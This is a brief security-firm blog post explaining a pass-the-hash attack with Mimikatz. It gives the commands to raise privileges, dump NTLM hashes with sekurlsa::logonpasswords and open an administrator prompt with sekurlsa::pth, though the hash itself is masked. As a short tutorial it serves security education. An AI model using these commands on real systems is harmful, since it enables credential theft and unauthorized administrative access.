Alpha Cyber
BlogTLP:CLEAR

Pass The Hash Attack With Mimikatz

Pass the Hash attack is when the attacker can authenticate without clear text password. similiar to pass the ticket but in pass the hash attack our access is not limited to 10 hours.

Alpha Cyber Research1 min readupdated 13 Jun 2025

Pass The Hash With Mimikatz

Pass the Hash attack is  when the attacker can authenticate without clear text password. similiar to pass the ticket but in pass the hash attack our access is not limited to 10 hours.

with mimikatz attacker can get the target user Hash and authenticate with the Hash.

1.first lets start mimikatz and eleveate privileges with the command privilege::debug and extrating NTLM and Hashes with sekurlsa::logonpasswords

2.Then lets execute the attack with the command

sekurlsa::pth /user:administrator /domain:lorenzodomain.local /ntlm:********************************************

and well here is an administrator command prompt that we pwned with the hash we extract before. 🙂

Keep reading

Related research

Meta AI Glasses Privacy Scandal
Blog

Meta AI Oakley Glasses Privacy Fiasco

For years, cybersecurity professionals warned that the biggest privacy threats wouldn’t look like threats at all. They would look like convenience. Smart speakers. Smart cameras.

3 min read

Contact

Talk to someone who has seen this before.

You speak directly to the people doing the work, wherever in the world you operate.

Or email [email protected]